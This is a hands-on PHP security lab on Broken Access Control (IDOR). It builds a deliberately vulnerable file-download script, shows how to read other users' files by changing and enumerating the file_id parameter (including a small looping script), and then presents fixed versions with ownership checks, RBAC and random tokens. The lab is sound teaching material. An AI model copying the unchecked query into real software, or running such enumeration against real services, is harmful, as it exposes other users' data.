Objective
Learn how to identify and exploit Broken Access Control (BAC) vulnerabilities that allow unauthorized users to access restricted resources. Understand best practices to enforce proper access control mechanisms.
Scenario
You are evaluating a file-sharing application where users can view and download their uploaded files. Due to improper access control, an attacker can manipulate URLs to access other users’ data. Your goal is to exploit this vulnerability and learn how to secure access controls.
Lab Setup
Prerequisites:
- Basic knowledge of PHP and SQL.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP and MySQL support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
Database Setup
Open phpMyAdmin and create a new database:
CREATE DATABASE bac_lab;
Use the database:
USE bac_lab;
Create a users table:
CREATE TABLE users (
id INT AUTO_INCREMENT PRIMARY KEY,
username VARCHAR(50) NOT NULL,
password VARCHAR(100) NOT NULL
);
Create a files table:
CREATE TABLE files (
id INT AUTO_INCREMENT PRIMARY KEY,
user_id INT NOT NULL,
filename VARCHAR(255) NOT NULL
);
Insert sample data (plaintext passwords are acceptable only in this lab; a real application stores the output of password_hash()):
INSERT INTO users (username, password) VALUES ('alice', 'alice123'), ('bob', 'bob123');
INSERT INTO files (user_id, filename) VALUES (1, 'alice_report.pdf'), (2, 'bob_secret.pdf');
PHP Script for File Download
Create a file download.php:
<?php
// download.php (deliberately vulnerable: no ownership check on file_id)
session_start();
$conn = mysqli_connect("localhost", "root", "", "bac_lab");
if (!$conn) {
    die("Database connection failed: " . mysqli_connect_error());
}
// Simulate user login
$_SESSION['user_id'] = 1; // Alice is logged in
if (isset($_GET['file_id'])) {
    // Cast to int so the only flaw left in this script is the access-control one
    $file_id = (int) $_GET['file_id'];
    // BUG: the query never checks that the file belongs to the logged-in user
    $query = "SELECT * FROM files WHERE id = '$file_id'";
    $result = mysqli_query($conn, $query);
    $file = mysqli_fetch_assoc($result);
    if ($file) {
        // Only simulates a download: it prints the record instead of sending the file
        echo "<h2>Downloading: " . htmlspecialchars($file['filename']) . "</h2>";
    } else {
        echo "<h2>File not found.</h2>";
    }
}
?>
Running the Application
- Start the Apache server.
- Start the Apache and MySQL services.
- Place download.php in the web server's document root (htdocs for XAMPP).
- Open http://localhost/download.php?file_id=1 to request Alice's file.
Exploitation Steps
Step 1: Accessing Other Users’ Files
- Open http://localhost/download.php?file_id=1 to access Alice’s file.
- Change the URL to http://localhost/download.php?file_id=2.
Expected Result:
- The application returns Bob’s file (bob_secret.pdf) even though Alice is the logged-in user: nothing ties the requested file_id to the session.
Step 2: Enumerating File IDs with a Proxy
- Intercept the request with browser developer tools or a proxy tool (e.g., Burp Suite) and replay it with different file_id values (Burp Repeater for single requests, Intruder for a range). Headers do not need to change; the only input the application acts on is the file_id parameter.
- Because IDs are sequential integers, every row in the files table can be found by counting up from 1; the “File not found.” response marks the gaps.
Expected Result:
- Every file in the table is retrievable from Alice’s single session, regardless of owner.
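The enumeration in Step 2 can be scripted instead of run through Burp Intruder. The script below is an added example, not part of the original lab; it assumes the vulnerable download.php is reachable at the $base URL, that file IDs are sequential integers starting at 1, and an arbitrary upper bound of 20 (both the bound and the regular expression matching the page's “Downloading:” heading are assumptions chosen to fit the lab page).

```php
<?php
// enumerate.php: added example for the lab, run with `php enumerate.php`.
// Assumptions: the vulnerable download.php from the lab answers at $base,
// IDs are sequential from 1, and $maxId is an arbitrary stopping point.
$base  = 'http://localhost/download.php?file_id=';
$maxId = 20;

// Short timeout; ignore_errors keeps the body of non-200 responses
$ctx = stream_context_create(['http' => ['timeout' => 3, 'ignore_errors' => true]]);

$found = [];
for ($id = 1; $id <= $maxId; $id++) {
    $body = @file_get_contents($base . $id, false, $ctx);
    if ($body === false) {
        fwrite(STDERR, "request failed for file_id=$id\n");
        continue;
    }
    // The vulnerable page echoes "Downloading: <filename>" for every existing row,
    // whoever owns it, so the heading itself is the enumeration oracle.
    if (preg_match('/Downloading: ([^<]+)/', $body, $m)) {
        $found[$id] = trim($m[1]);
        echo "file_id=$id -> {$found[$id]}\n";
    }
}
echo count($found) . " file(s) reachable from a single session\n";
```

On the lab database this should list both alice_report.pdf and bob_secret.pdf from Alice's session. The same loop run against the fixed version should report only file_id=1, which is a quick regression check after applying the fix.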
Solution and Prevention
Problem Analysis
- The application trusts the client-supplied file_id and never checks that the file belongs to the session’s user. This is an Insecure Direct Object Reference (IDOR), the most common form of Broken Access Control: authentication exists (a user is logged in) but authorization of the specific object is missing.
Fixing the Vulnerability
Verify User Ownership
Modify download.php
to restrict file access:
<?php
// download.php (fixed: the query enforces object-level authorization)
session_start();
$conn = mysqli_connect("localhost", "root", "", "bac_lab");
if (!$conn) {
    die("Database connection failed: " . mysqli_connect_error());
}
// Lab shortcut: simulate Alice being logged in. In a real application this value
// is set only by the login handler and never taken from request input.
$_SESSION['user_id'] = 1;
if (empty($_SESSION['user_id'])) {
    http_response_code(401);
    die("<h2>Not logged in.</h2>");
}
$user_id = (int) $_SESSION['user_id'];
if (isset($_GET['file_id'])) {
    $file_id = (int) $_GET['file_id'];
    // Ownership is part of the query itself, bound through a prepared statement
    $stmt = mysqli_prepare($conn, "SELECT id, filename FROM files WHERE id = ? AND user_id = ?");
    mysqli_stmt_bind_param($stmt, "ii", $file_id, $user_id);
    mysqli_stmt_execute($stmt);
    $file = mysqli_fetch_assoc(mysqli_stmt_get_result($stmt));
    if ($file) {
        echo "<h2>Downloading: " . htmlspecialchars($file['filename']) . "</h2>";
    } else {
        // One response for both "no such file" and "not your file", so the
        // error message cannot be used to confirm that another user's file exists
        http_response_code(404);
        echo "<h2>Access Denied!</h2>";
    }
}
?>
Implement Role-Based Access Control (RBAC)
Define user roles and permissions to manage access rights.
Use Object-Level Access Control
Validate that users can only access objects they own.
Avoid Predictable Resource Identifiers
Replace incremental IDs with UUIDs or random tokens so that other users’ files cannot be found by counting. This only raises the cost of enumeration; it is not authorization. A leaked or shared link must still fail the ownership check, so the user_id condition stays in the query even when the lookup key is unguessable.
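The four measures above (ownership verification, RBAC, object-level checks, unguessable identifiers) combine into one handler. The script below is an added example written for this lab, not the lab’s own code, and it also does what the lab’s download.php only simulates: it sends the file. It assumes a schema extension that the lab does not have: a token CHAR(32) column on files holding bin2hex(random_bytes(16)) assigned at upload time, a role column on users containing 'user' or 'admin', and uploads stored under a directory outside the web root, named by their database id. The ALTER TABLE statements in the comments are part of the same assumption.

```php
<?php
// secure_download.php: added example, not part of the original lab.
// Assumed schema changes (run once in phpMyAdmin):
//   ALTER TABLE files ADD COLUMN token CHAR(32) NOT NULL UNIQUE;
//   ALTER TABLE users ADD COLUMN role VARCHAR(10) NOT NULL DEFAULT 'user';
// Assumed storage: uploads live in STORAGE_DIR (not web-served) as <files.id>.
session_start();
const STORAGE_DIR = '/var/app/private_uploads'; // assumption: outside the web root

if (empty($_SESSION['user_id'])) {
    http_response_code(401);
    exit('Not logged in.');
}
$user_id = (int) $_SESSION['user_id'];

// Validate the shape of the identifier before it reaches the database
$token = $_GET['token'] ?? '';
if (!preg_match('/^[0-9a-f]{32}$/', $token)) {
    http_response_code(404);
    exit('File not found.');
}

$conn = mysqli_connect("localhost", "root", "", "bac_lab");
if (!$conn) {
    http_response_code(500);
    exit('Database error.');
}

// RBAC: the role comes from the server-side user record, never from the request
$stmt = mysqli_prepare($conn, "SELECT role FROM users WHERE id = ?");
mysqli_stmt_bind_param($stmt, "i", $user_id);
mysqli_stmt_execute($stmt);
$user = mysqli_fetch_assoc(mysqli_stmt_get_result($stmt));
$is_admin = $user !== null && $user['role'] === 'admin';

// Object-level check: look the file up by its random token, then require that
// the caller owns it or is an admin. The token stops enumeration; the ownership
// test is what actually authorizes, so a leaked token is still not enough.
$stmt = mysqli_prepare($conn, "SELECT id, filename, user_id FROM files WHERE token = ?");
mysqli_stmt_bind_param($stmt, "s", $token);
mysqli_stmt_execute($stmt);
$file = mysqli_fetch_assoc(mysqli_stmt_get_result($stmt));

if ($file === null || ((int) $file['user_id'] !== $user_id && !$is_admin)) {
    // Identical response for "missing" and "not yours": no oracle for attackers
    http_response_code(404);
    exit('File not found.');
}

// The on-disk path is derived from the database id, never from the stored
// filename or from request input, so path traversal has nothing to work with.
$path = STORAGE_DIR . '/' . (int) $file['id'];
if (!is_file($path)) {
    http_response_code(404);
    exit('File not found.');
}

// The user-chosen filename is only ever placed in the download header, sanitized
$safe_name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($file['filename']));
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $safe_name . '"');
header('Content-Length: ' . filesize($path));
header('X-Content-Type-Options: nosniff');
readfile($path);
```

Requests look like http://localhost/secure_download.php?token=<32 hex chars>. Note the order of checks: session, identifier syntax, role lookup, object ownership, and only then the filesystem. Putting the ownership condition in the SELECT for the simple case (as the fixed download.php does) or in code after the SELECT (as here, to allow the admin override) are both acceptable; what matters is that no response is produced before the check has passed.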
Testing After Fix
- Log in as Alice and access http://localhost/download.php?file_id=1.
- Attempt to access Bob’s file at http://localhost/download.php?file_id=2.
Expected Result:
- The first request shows alice_report.pdf; the second returns “Access Denied!”, because the query now requires user_id to match the session’s user. Repeat the test as Bob (set $_SESSION['user_id'] to 2) to confirm the check is symmetric and not accidentally tied to user 1.
Conclusion
In this lab, you exploited a Broken Access Control (BAC) vulnerability, specifically an Insecure Direct Object Reference, to access another user’s resource. You also learned how to mitigate this issue by verifying object ownership on every request, adding role-based access control (RBAC) for privileged users, and using unguessable resource references to prevent enumeration.